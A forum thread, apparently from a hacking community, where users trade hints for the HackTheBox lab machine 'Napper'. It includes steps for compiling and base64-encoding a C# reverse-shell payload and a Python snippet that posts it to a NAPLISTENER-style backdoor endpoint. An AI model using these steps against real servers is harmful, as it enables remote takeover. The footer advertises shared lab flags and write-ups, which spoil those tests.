HTB - Napper
by peRd1 - Saturday November 11, 2023 at 07:18 PM
#21
I read something about Naplistener , here is a website, but I do not understand how the PoC works, I did not se a "Naplistener" repository or something to work with this . If someone here is polite and smarter than me , can help me with a hint.

https://www.elastic.co/security-labs/nap...iestagraph

I do not understand how I can trigger this kind of exploit if I had not made it before.
Reply
#22
i tried this originally and wasnt working, tried with mono and csc
even changed the cmd to powershell and nada when i did it

(Nov 12, 2023, 03:25 AM)Akless Wrote: Para la bandera del usuario usen:

https://gist.github.com/BankSecurity/55f...b79b2a83cc
En el enlace encuentran un archivo .cv solo le cambian la IP el puerto y deben de ponerme donde dice powershell se lo cambian a cmd.exe y compilan el archivo y luego lo pasan a base 64 que es el que pone payload:

Base64 -w0 payload.exe | xclip -sel clip donde dice payload.exe es despues de la compilacion que deben de hacer con el link que les deje adjunto

adicional hay un PoC
import requests
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


hosts=["napper.htb"]
payload = "<>"

form_field=f"sdafwe3rwe23={requests.utils.quote(payload)}"

for h in hosts:
   url_ssl= f"https://{h}/ews/MsExgHealthCheckd/"

   try:
       r_ssl = requests.post(url_ssl, data=form_field, verify=False)
       print(f"{url_ssl} : {r_ssl.status_code} {r_ssl.headers}")
   except KeyboardInterupt:
       exit()
   except Exception as e:
       print("e")
       pass

Reply
#23
(Nov 12, 2023, 03:25 AM)Akless Wrote: Para la bandera del usuario usen:

https://gist.github.com/BankSecurity/55f...b79b2a83cc

i'm try this
thes is don't work for me ;(
tried with mcs
Reply
#24
(Nov 12, 2023, 03:18 AM)Miranda0315 Wrote:
(Nov 12, 2023, 01:31 AM)Akless Wrote: I've already got the user flag, any clues about root?

any clue about the user flag?

How to get user any solution.
Reply
#25
(Nov 12, 2023, 06:02 AM)Junkman2531 Wrote: i tried to shrink the file size of my binary.

I enabled trimming and the other size saving options in visual studio but it is still 14 MB which is probably still too much to base64 encode and send via http.
Why is your compiled exe that large? It should be few kilobytes. Maybe couple dozens. Certainly not megabytes.

Try using csc or mono.
Reply
#26
I'm wonder how do you gays find the path '/ews/MsExgHealthCheckd/', I couldn't find it in all my dict. Is there any new dict source? or find it by other behaviors or hints. Huh Thanks.
Reply
#27
(Nov 12, 2023, 01:42 PM)tazarkour Wrote:
(Nov 12, 2023, 01:40 PM)VfV Wrote:
(Nov 12, 2023, 12:55 PM)maybemia Wrote: I'm wonder how do you gays find the path '/ews/MsExgHealthCheckd/', I couldn't find it in all my dict. Is there any new dict source? or find it by other behaviors or hints. Huh Thanks.

+1 , what were the steps involved in order to arrive there? I'm trying to learn

Maybe they used a custom dict or just saw the name of the machine so they recognized the vulnerability.
Read the blog posts, entries, on the website and its internal sites, once you could logon there. It's all there, also specifies sources regarding that vulnerability.
Reply
#28
(Nov 12, 2023, 02:01 PM)tazarkour Wrote:
(Nov 12, 2023, 01:53 PM)peRd1 Wrote:
(Nov 12, 2023, 01:42 PM)tazarkour Wrote:
(Nov 12, 2023, 01:40 PM)VfV Wrote:
(Nov 12, 2023, 12:55 PM)maybemia Wrote: I'm wonder how do you gays find the path '/ews/MsExgHealthCheckd/', I couldn't find it in all my dict. Is there any new dict source? or find it by other behaviors or hints. Huh Thanks.

+1 , what were the steps involved in order to arrive there? I'm trying to learn

Maybe they used a custom dict or just saw the name of the machine so they recognized the vulnerability.
Read the blog posts, entries, on the website and its internal sites, once you could logon there. It's all there, also specifies sources regarding that vulnerability.

How can I login there ?

I find something useful in "https://app.napper.htb/posts/setup-basic-auth-powershell/" step 6, which solve my problem. Thanks. It seams I need to learn more recon things.
Reply
#29
my rev shell payload is super slow in read/write
Reply
#30
(Nov 12, 2023, 08:34 PM)chillywilly Wrote: my rev shell payload  is super slow in read/write

did you do anything special ? I sent the payload base64 encoded but no revshell
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 602 91,760 5 hours ago
Last Post: sabero_exe
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,963 Yesterday, 09:54 AM
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,893 Yesterday, 08:48 AM
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,621 Yesterday, 05:08 AM
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,273 Apr 30, 2026, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)